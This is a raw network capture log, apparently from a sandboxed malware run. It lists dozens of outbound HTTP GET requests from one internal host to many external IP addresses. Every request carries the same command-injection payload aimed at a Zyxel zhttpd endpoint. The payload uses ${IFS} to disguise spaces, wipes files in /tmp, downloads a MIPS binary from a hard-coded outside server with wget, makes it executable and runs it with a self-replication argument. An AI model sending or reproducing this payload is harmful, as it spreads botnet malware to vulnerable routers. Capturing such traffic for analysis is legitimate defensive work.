                                                        Jan 28, 2024 10:12:41.180453062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1572192.168.2.144254678.117.242.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180471897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1573192.168.2.143879835.239.251.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180530071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1574192.168.2.1447512114.143.95.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180572987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1575192.168.2.145155020.122.17.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180605888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1576192.168.2.1446498190.8.210.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180623055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1577192.168.2.1459368152.131.205.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180653095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1578192.168.2.14369069.86.2.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180686951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1579192.168.2.145583474.16.210.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180743933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1580192.168.2.1443902197.184.158.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180767059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1581192.168.2.14594181.252.204.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180807114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1582192.168.2.1435180124.238.29.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180860043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1583192.168.2.143975277.245.155.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180898905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1584192.168.2.144954431.144.183.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180955887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1585192.168.2.144648013.237.231.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180982113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1586192.168.2.144748851.4.236.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181006908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1587192.168.2.1456466134.207.128.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181055069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1588192.168.2.1459410195.13.39.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181111097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1589192.168.2.143593066.220.128.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181153059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1590192.168.2.143950484.56.18.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181184053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1591192.168.2.145010018.60.223.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181216002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1592192.168.2.1451318206.15.51.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181278944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1593192.168.2.14552909.227.173.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181298971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1594192.168.2.145251492.27.203.94443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181334019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1595192.168.2.1433192223.85.20.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181377888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1596192.168.2.1435114110.115.104.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181406975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1597192.168.2.144217895.36.68.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181473017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1598192.168.2.1436174144.52.173.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181499958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1599192.168.2.145805012.109.221.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181526899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1600192.168.2.1445408205.99.148.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181567907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1601192.168.2.143399852.84.217.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181590080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1602192.168.2.145832439.222.198.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181652069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1603192.168.2.1444556182.141.53.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181688070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1604192.168.2.145205473.7.222.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181740999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1605192.168.2.1443898122.210.113.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181772947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1606192.168.2.143705639.18.79.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181814909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1607192.168.2.14380829.35.201.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181866884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1608192.168.2.1455880216.15.84.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181901932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1609192.168.2.1456560138.54.133.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181936979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1610192.168.2.145688697.216.239.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.181976080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1611192.168.2.143623236.122.7.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.182045937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1612192.168.2.1439236185.42.237.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.182084084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1613192.168.2.1452656107.58.161.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.182132959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1614192.168.2.1447186210.57.96.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.182225943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1615192.168.2.144794832.92.87.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.182255983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1616192.168.2.144372061.65.177.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.182293892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1617192.168.2.1447760182.1.235.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.182332993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1618192.168.2.145494260.224.8.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.182364941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1619192.168.2.1458116166.139.39.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.182444096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1620192.168.2.144059225.215.168.94443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.182457924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1621192.168.2.145152286.124.183.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.182508945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1622192.168.2.145374445.146.50.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.182538033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1623192.168.2.1436216209.222.201.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.182574034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1624192.168.2.1449580129.126.108.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.182625055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1625192.168.2.1460998175.172.91.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.182662964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1626192.168.2.144687280.140.222.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.182687998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1627192.168.2.1447030149.151.54.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.182729006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1628192.168.2.1436432138.130.185.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.182755947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1629192.168.2.1448812121.53.58.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.182796001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1630192.168.2.145126495.228.108.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.182836056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1631192.168.2.146062487.174.5.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.182894945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1632192.168.2.145293220.161.15.217443
                                                        TimestampBytes transferredDirectionData
